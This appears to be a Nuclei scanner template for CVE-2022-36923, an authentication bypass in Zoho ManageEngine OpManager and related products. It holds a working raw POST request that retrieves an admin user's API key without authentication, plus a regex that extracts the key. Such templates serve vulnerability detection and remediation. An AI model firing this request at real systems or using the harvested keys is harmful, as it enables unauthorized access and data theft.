id: CVE-2022-36923

info:
  name: Zoho ManageEngine - getUserAPIKey Authentication Bypass
  author: daffainfo,jjcho
  severity: high
  description: |
    Zoho ManageEngine OpManager, OpManager Plus, OpManager MSP, Network Configuration Manager, NetFlow Analyzer, Firewall Analyzer, and OpUtils before 2022-07-27 through 2022-07-28 (125657, 126002, 126104, and 126118) allow unauthenticated attackers to obtain a user's API key, and then access external APIs.
  impact: |
    Attackers can obtain API keys and access external APIs, leading to potential data theft or unauthorized actions.
  remediation: |
    Apply the security patches released after 2022-07-28 or update to the latest version.
  reference:
    - https://www.manageengine.com/itom/advisory/cve-2022-36923.html
    - https://y4er.com/posts/cve-2022-36923-manageengine-opmanager-getuserapikey-authentication-bypass/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36923
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-36923
    epss-score: 0.26837
    epss-percentile: 0.96452
    cwe-id: CWE-755,CWE-284
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager_msp:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_opmanager_plus:*:*:*:*:*:*:*:*,cpe:2.3:a:zohocorp:manageengine_oputils:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zohocorp
    product: manageengine_firewall_analyzer,manageengine_netflow_analyzer,manageengine_network_configuration_manager,manageengine_opmanager,manageengine_opmanager_msp,manageengine_opmanager_plus,manageengine_oputils
  tags: cve,cve2022,zoho,manageengine,opmanager,oputils,auth-bypass,vkev

http:
  - raw:
      - |
        POST /RestAPI/getAPIKey HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=getUserAPIKey&username=admin&domainname=-&HANDSHAKE_KEY=pppppppppppppppppppppppppppppppppppp

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body) == 34"
          - 'regex("[0-9a-f]+", body)'
          - "status_code == 200"
          - "contains(set_cookie, 'opmcsrfcookie=')"
        condition: and

    extractors:
      - type: regex
        regex:
          - '[0-9a-f]+'
# digest: 4b0a0048304602210081d4cdab70eed28ebd0b1d21a196f59707cacfdb79c0db67ca02ba6f1f3f004d022100caa05195161035c0abea6a7cf303205cabb043f8baf0eda1af59fe9a44fdbd3a:922c64590222798bb761d5b6d8e72950